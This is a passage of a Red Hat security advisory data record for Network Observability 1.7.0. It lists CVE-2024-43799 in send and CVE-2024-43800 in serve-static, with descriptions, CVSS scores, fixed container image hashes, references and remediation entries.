"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "express: Improper Input Handling in Express Redirects", }, { cve: "CVE-2024-43799", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:30.869487+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311153", }, ], notes: [ { category: "description", text: "A flaw was found in the Send library. This vulnerability allows remote code execution via untrusted input passed to the SendStream.redirect() function.", title: "Vulnerability description", }, { category: "summary", text: "send: Code Execution Vulnerability in Send Library", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43799", }, { category: "external", summary: "RHBZ#2311153", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311153", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43799", url: "https://www.cve.org/CVERecord?id=CVE-2024-43799", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43799", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43799", }, { category: "external", summary: "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35", url: "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35", }, { category: "external", summary: "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg", url: "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg", }, ], release_date: "2024-09-10T15:15:17.727000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-22T01:05:39+00:00", details: "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8014", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "send: Code Execution Vulnerability in Send Library", }, { cve: "CVE-2024-43800", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:33.631718+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311154", }, ], notes: [ { category: "description", text: "A flaw was found in serve-static. This issue may allow the execution of untrusted code via passing sanitized yet untrusted user input to redirect().", title: "Vulnerability description", }, { category: "summary", text: "serve-static: Improper Sanitization in serve-static", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43800", }, { category: "external", summary: "RHBZ#2311154", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311154", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43800", url: "https://www.cve.org/CVERecord?id=CVE-2024-43800", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43800", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43800", }, { category: "external", summary: "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b", url: "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b", }, { category: "external", summary: "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa", url: "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa", }, { category: "external", summary: "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p", url: "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p", }, ], release_date: "2024-09-10T15:15:17.937000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-22T01:05:39+00:00", details: "For details on how to apply this update, refer to: 